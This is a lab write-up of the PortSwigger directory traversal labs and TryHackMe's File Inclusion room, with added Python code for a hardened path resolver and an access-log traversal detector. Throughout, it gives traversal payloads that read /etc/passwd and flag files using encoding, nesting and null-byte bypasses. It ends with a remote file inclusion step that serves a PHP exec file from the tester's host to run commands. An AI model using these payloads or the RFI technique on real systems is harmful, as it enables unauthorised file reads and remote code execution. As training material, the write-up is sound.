Web Fundamentals | File Inclusion
Hi there, I’m glad to see you here. In this article, we’ll examine together the “File Inclusion” room in TryHackMe and the “Directory Traversal” room in PortSwigger. In some sections, I’ll share a brief overview of the subject. Don’t forget! You must always research to learn more. I hope it will be helpful for you. Let’s start!
Contents:
- Introduction
- Directory Traversal / PortSwigger
- Path Traversal / TryHackMe
- Local File Inclusion #1
- Local File Inclusion #2
- Remote File Inclusion
- Challenge
Introduction
File Inclusion vulnerabilities are commonly found and exploited in web applications written in various programming languages, such as PHP, when the application is poorly written and implemented. The root cause of these vulnerabilities is missing input validation: user input is neither sanitized nor validated, yet the user controls it. When the input is not validated, the user can pass any value to the function, which causes the vulnerability.
Directory Traversal / PortSwigger
Directory traversal (also known as file path traversal) is a web security vulnerability that allows an attacker to read arbitrary files on the server that is running an application.
When we access the lab environment, we’re greeted by a shopping site.
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image.
👉🏻Send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
../../../etc/passwd
❗️The sequence ../ is valid within a file path, and means to step up one level in the directory structure.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences blocked with absolute path bypass
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
/etc/passwd
❗️You might be able to use an absolute path from the filesystem root, such as filename=/etc/passwd, to directly reference a file without using any traversal sequences.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences stripped non-recursively
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
....//....//....//etc/passwd
❗️You might be able to use nested traversal sequences, such as ....// or ....\/, which will revert to simple traversal sequences when the inner sequence is stripped.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, traversal sequences stripped with superfluous URL-decode
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
..%252f..%252f..%252fetc/passwd
❗️In some contexts, such as in a URL path or the filename parameter of a multipart/form-data request, web servers may strip any directory traversal sequences before passing your input to the application. You can sometimes bypass this kind of sanitization by URL encoding, or even double URL encoding, the ../ characters, resulting in %2e%2e%2f or %252e%252e%252f respectively.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, validation of start of path
If an application requires that the user-supplied filename must start with the expected base folder, such as /var/www/images, then it might be possible to include the required base folder followed by suitable traversal sequences.
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
/var/www/images/../../../etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
File path traversal, validation of file extension with null byte bypass
👉🏻Use Burp Suite to intercept and modify a request that fetches a product image and send the request to the Repeater.
👉🏻Modify the filename parameter, giving it the value:
../../../etc/passwd%00.png
❗️Null byte injection is a bypass technique for sending data that would otherwise be filtered. It relies on injecting null byte characters (%00, \x00) into the supplied data. The null byte’s role is to terminate a string.
https://www.thehacker.recipes/web/inputs/null-byte-injection
👉🏻Observe that the response contains the contents of the /etc/passwd file.
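The five PortSwigger labs above each break because the application filters the filename string instead of resolving the path and checking where it lands. The following Python snippet is an added example (not code from the labs or from PortSwigger) that models the weak filters next to a hardened resolver: strip_once is the non-recursive strip, strip_then_decode strips before URL-decoding (the value the app sees after the web server has decoded %252f once is ..%2f..), starts_with_base and has_png_extension are the prefix and extension checks, and safe_resolve rejects NUL bytes, canonicalizes the joined path and confirms it is still under the base folder. BASE_DIR is assumed to be /var/www/images as in the lab text; posixpath is used so the demonstration runs without touching the filesystem (in a real service, resolve symlinks with os.path.realpath before the prefix comparison).

```python
import posixpath
import urllib.parse

# Assumed base folder for the image store (the lab text uses /var/www/images).
BASE_DIR = "/var/www/images"


def strip_once(name):
    """Weak filter: removes every literal '../' once, without re-scanning."""
    return name.replace("../", "")


def strip_then_decode(name):
    """Weak filter: strips traversal sequences first, then URL-decodes."""
    return urllib.parse.unquote(strip_once(name))


def starts_with_base(name):
    """Weak check: only requires the raw string to begin with the base folder."""
    return name.startswith(BASE_DIR)


def has_png_extension(name):
    """Weak check: only looks at the trailing characters of the raw string."""
    return name.endswith(".png")


def naive_path(name):
    """What a lab-style application ends up opening: base joined with the name."""
    return posixpath.normpath(posixpath.join(BASE_DIR, name))


def safe_resolve(name, base=BASE_DIR):
    """Hardened resolver: reject embedded NUL, canonicalize, then confirm the
    result is the base folder or lies strictly below it. Returns None on reject."""
    if "\x00" in name:
        return None
    resolved = posixpath.normpath(posixpath.join(base, name))
    if resolved != base and not resolved.startswith(base + "/"):
        return None
    return resolved


if __name__ == "__main__":
    # Constructed inputs mirroring the lab payloads, shown against each filter.
    samples = [
        "cat.png",
        "../../../etc/passwd",
        "/etc/passwd",
        "....//....//....//etc/passwd",
        "..%2f..%2f..%2fetc/passwd",
        "/var/www/images/../../../etc/passwd",
        "../../../etc/passwd\x00.png",
    ]
    for s in samples:
        print(repr(s))
        print("  naive after strip_once   :", naive_path(strip_once(s)))
        print("  strip_then_decode        :", strip_then_decode(s))
        print("  starts_with_base         :", starts_with_base(s))
        print("  has_png_extension        :", has_png_extension(s))
        print("  safe_resolve             :", safe_resolve(s))
```

The design point is that safe_resolve never tries to clean the string; it computes the path the operating system would actually use and then makes a single allow/deny decision on that result, so nested sequences, a second decoding pass, a valid-looking prefix or a trailing extension cannot change the outcome.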
Path Traversal / TryHackMe
Also known as “Directory Traversal”, it is a web security vulnerability that allows an attacker to read operating system resources, such as local files on the server running an application. The attacker exploits this vulnerability by manipulating and abusing the web application’s URL to locate and access files or directories stored outside the application’s root directory.
❗️Path traversal vulnerabilities occur when the user’s input is passed to a function such as file_get_contents in PHP.
https://www.php.net/manual/en/function.file-get-contents.php
Answer the questions below
❓Q1: What function causes path traversal vulnerabilities in PHP?
📣A1: file_get_contents
Local File Inclusion #1
Local file inclusion (also known as LFI) is the process of including files that are already present locally on the server, by exploiting vulnerable inclusion procedures implemented in the application.
❗️In PHP, functions such as include, require, include_once, and require_once often contribute to vulnerable web applications.
Answer the questions below
❓Q1: Give Lab #1 a try to read /etc/passwd. What would the request URI be?
📣A1: /lab1.php?file=/etc/passwd
Lab #1
👉🏻Include a file and examine the error message.
👉🏻Use Burp Suite to capture the request and then send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
/etc/passwd
❗️In this case, it works because there isn’t a directory specified in the include function and no input validation.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q2: In Lab #2, what is the directory specified in the include function?
📣A2: includes
Lab #2
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
Local File Inclusion #2
In this task, we go a little bit deeper into LFI. We’ll examine a couple of techniques to bypass the filter within the include function.
Answer the questions below
❓Q1: Give Lab #3 a try to read /etc/passwd. What does the request look like?
📣A1: /lab3.php?file=../../../../etc/passwd%00
Lab #3
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd%00
❗️Null byte injection is a technique that appends a URL-encoded null byte (%00, or 0x00 in hex) to user-supplied data in order to terminate the string. You could think of it as trying to trick the web app into disregarding whatever comes after the null byte.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q2: Which function is causing the directory traversal in Lab #4?
📣A2: file_get_contents
Lab #4
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/passwd/.
❗️If we try this concept in the file system using “cd ..”, it takes you back one step; however, if you do “cd .”, you stay in the current directory. Similarly, “/etc/passwd/..” resolves to “/etc/”, because we moved up one level. Now if we try “/etc/passwd/.”, the result will be “/etc/passwd”, since the dot refers to the current directory.
👉🏻Observe that the response contains the contents of the /etc/passwd file.
Lab #5
👉🏻Include a file and examine the error message.
❗️If we check the warning message in the include(includes/etc/passwd) section, we know that the web application replaces the ../ with the empty string. We can use the following technique to bypass this.
👉🏻Modify the file parameter, giving it the value:
....//....//....//....//etc/passwd
👉🏻Observe that the response contains the contents of the /etc/passwd file.
❓Q3: Try out Lab #6 and check which directory has to be in the input field.
📣A3: THM-profile
❓Q4: Try out Lab #6 and read /etc/os-release. What is the VERSION_ID value?
📣A4: 12.04
Lab #6
Finally, we’ll discuss the case where the developer forces the include to read from a defined directory! For example, if the web application asks to supply input that has to include a directory such as: “http://webapp.thm/index.php?lang=languages/EN.php” then, to exploit this, we need to include the directory in the payload like so:
?lang=languages/../../../../../etc/passwd
👉🏻Include a file and examine the error message.
👉🏻Modify the file parameter, giving it the value:
THM-profile/../../../../etc/os-release
👉🏻Observe that the response contains the contents of the /etc/os-release file.
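Labs #2 to #6 each use a different shape of input (plain ../, a trailing %00, a trailing /., the nested ....// form, and a required directory prefix). On the detection side, all of them are visible in the web server’s access log, because the request line is logged before decoding. The snippet below is an added example (not from the TryHackMe room) that parses constructed Apache-style log lines, URL-decodes each query value as many times as it changes, and flags a request when it contains a .. path component, a null byte, a nested sequence, needed two decoding rounds, or would resolve outside an assumed base directory. The lab file names and client addresses in SAMPLE_LOG are constructed for the example.

```python
import posixpath
import re
import urllib.parse

# Constructed Apache combined-format lines; addresses and file names are not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /lab1.php?file=intro.php HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Jan/2024:10:00:02 +0000] "GET /lab2.php?file=../../../../etc/passwd HTTP/1.1" 200 1830 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:03 +0000] "GET /lab3.php?file=../../../../etc/passwd%00 HTTP/1.1" 200 1830 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:04 +0000] "GET /lab4.php?file=../../../../etc/passwd/. HTTP/1.1" 200 1830 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:05 +0000] "GET /lab5.php?file=....//....//....//....//etc/passwd HTTP/1.1" 200 1830 "-" "curl/8.0"
10.0.0.7 - - [01/Jan/2024:10:00:06 +0000] "GET /lab6.php?file=THM-profile/../../../../etc/os-release HTTP/1.1" 200 300 "-" "curl/8.0"
10.0.0.9 - - [01/Jan/2024:10:00:07 +0000] "GET /image?filename=..%252f..%252f..%252fetc/passwd HTTP/1.1" 200 1830 "-" "curl/8.0"
10.0.0.5 - - [01/Jan/2024:10:00:08 +0000] "GET /lab6.php?file=THM-profile/en.php HTTP/1.1" 200 420 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
# A '..' that forms a whole path component (either slash style).
DOTDOT_COMPONENT = re.compile(r"(?:^|[\\/])\.\.(?:[\\/]|$)")
# Nested sequences that survive a single non-recursive strip.
NESTED_SEQUENCE = re.compile(r"\.\.\.\.[\\/]{2}|\.\.\.\.\\/")
# Sentinel base directory used only to test whether the value escapes its folder.
SENTINEL_BASE = "/base"


def url_decode(value, max_rounds=3):
    """Decode until stable; return (decoded, number_of_rounds_that_changed_it)."""
    rounds = 0
    while rounds < max_rounds:
        decoded = urllib.parse.unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def escapes_base(decoded):
    """True if joining the value onto a base folder resolves outside that folder."""
    resolved = posixpath.normpath(posixpath.join(SENTINEL_BASE, decoded))
    return resolved != SENTINEL_BASE and not resolved.startswith(SENTINEL_BASE + "/")


def classify_value(raw):
    """Return the list of reasons a single raw query value looks like traversal."""
    reasons = []
    decoded, rounds = url_decode(raw)
    if rounds >= 2:
        reasons.append("double-encoded")
    if NESTED_SEQUENCE.search(raw) or NESTED_SEQUENCE.search(decoded):
        reasons.append("nested-traversal")
    if "\x00" in decoded:
        reasons.append("null-byte")
    if DOTDOT_COMPONENT.search(decoded):
        reasons.append("traversal")
    if escapes_base(decoded):
        reasons.append("escapes-base")
    return reasons


def scan_log(text):
    """Parse log lines and return one hit dict per request that triggers any reason."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip blank or malformed lines
        query = urllib.parse.urlsplit(m.group("path")).query
        reasons = []
        for pair in query.split("&"):
            _key, _sep, raw = pair.partition("=")
            reasons.extend(classify_value(raw))
        if reasons:
            hits.append({"client": m.group("client"), "path": m.group("path"),
                         "status": m.group("status"), "reasons": sorted(set(reasons))})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["client"], hit["status"], hit["path"], ",".join(hit["reasons"]))
```

Note the deliberate split between the raw and decoded views: the nested ....// form is matched on the raw string because it is designed to look harmless after one strip, while the .. component and null byte checks run on the fully decoded value because that is what the include function ultimately sees. Pairing a hit with a 200 status, as in the sample, is the signal that the read may have succeeded.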
Remote File Inclusion
Remote File Inclusion (also known as RFI) is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives as input the path to the file that has to be included, and this input is not properly sanitized, allowing an external URL to be injected.
❗️One requirement for RFI is that the “allow_url_fopen” option needs to be on.
Note: You can examine the example about Remote File Inclusion at the end of the article.
Challenge
Great job! Now let’s apply the techniques we’ve learned to capture the flags!
Answer the questions below
❓Q1: Capture Flag1 at /etc/flag1
📣A1: *****************
👉🏻Change the request method to use the POST method instead of the GET method.
👉🏻And then forward the request.
👉🏻Examine the error message.
👉🏻Send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/flag1
👉🏻Observe that the response contains the contents of the /etc/flag1 file.
❓Q2: Capture Flag2 at /etc/flag2
📣A2: ****************
👉🏻Forward the request.
👉🏻Examine the error message.
👉🏻Send the request to the Repeater.
👉🏻Modify the THM parameter, giving it the value:
../../../../etc/flag2%00
👉🏻Observe that the response contains the contents of the /etc/flag2 file.
❓Q3: Capture Flag3 at /etc/flag3
📣A3: ****************
👉🏻Include a file and examine the error message.
👉🏻Change the request method to use the POST method instead of the GET method.
👉🏻Send the request to the Repeater.
👉🏻Modify the file parameter, giving it the value:
../../../../etc/flag3%00
👉🏻Observe that the response contains the contents of the /etc/flag3 file.
❓Q4: Gain RCE in Lab #Playground /playground.php with RFI to execute the hostname command. What is the output?
📣A4: ***********************
About the RFI to RCE :
https://www.thehacker.recipes/web/inputs/file-inclusion/rfi-to-rce
👉🏻Create a PHP file that contains the following PHP code to display the hostname information.
<?php
print exec('hostname');
?>
👉🏻Start a web server.
python3 -m http.server
👉🏻Use the ifconfig command to find out the IP address you received as a result of your VPN tunnel connection.
👉🏻To include the PHP file we created:
http://10.10.25.60/playground.php?file=http://10.11.6.38:8000/hostname.php
Congratulations! We basically learned together how to exploit the “File Inclusion” vulnerability, which is one of the web application vulnerabilities. 👊🏻
Thank you for your time. See you soon! Until then... Happy Hacking ❤
Resources:
https://portswigger.net/web-security/file-path-traversal